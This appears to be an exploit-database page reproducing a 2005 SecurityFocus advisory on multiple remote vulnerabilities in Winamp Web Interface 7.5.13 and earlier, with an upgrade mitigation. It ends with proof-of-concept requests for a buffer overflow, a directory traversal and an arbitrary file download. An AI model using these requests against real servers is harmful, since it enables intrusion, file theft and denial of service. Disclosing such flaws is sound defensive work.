header-logo
Suggest Exploit
vendor:
Winamp Web Interface
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer-overflow, Directory-traversal, Arbitrary file-download, Denial-of-service, Information-disclosure
120, 22, 7.5, 5, 200
CWE
Product Name: Winamp Web Interface
Affected Version From: 7.5.13 and prior versions
Affected Version To: 7.5.13 and prior versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Winamp Web Interface Multiple Remote Vulnerabilities

An attacker can exploit these issues to execute arbitrary code within the context of the affected application, crash the affected application, deny service to legitimate users, download arbitrary files, and obtain sensitive information. Other attacks are also possible.

Mitigation:

Upgrade to the latest version of Winamp Web Interface
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21539/info

Winamp Web Interface is prone to multiple remote vulnerabilities. These issues include:

- Buffer-overflow issues
- A directory-traversal issue
- An arbitrary file-download issue
- A denial-of-service issue
- An information-disclosure issue 

An attacker can exploit thse issues to execute arbitrary code within the context of the affected application, crash the affected application, deny service to legitimate users, download arbitrary files, and obtain sensitive information. Other attacks are also possible. 

Winamp Web Interface 7.5.13 and prior versions are vulnerable to these issues.

Buffer-overflow vulnerabilities:
http://www.example.com/browse then insert an username longer than 100 chars
http://www.example.com/dl?file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Directory-traversal:
http://www.example.com/browse?path=%2f..%2f..%2f

Arbitrary file-download vulnerability: 
http://www.example.com/dl?file=\file.txt.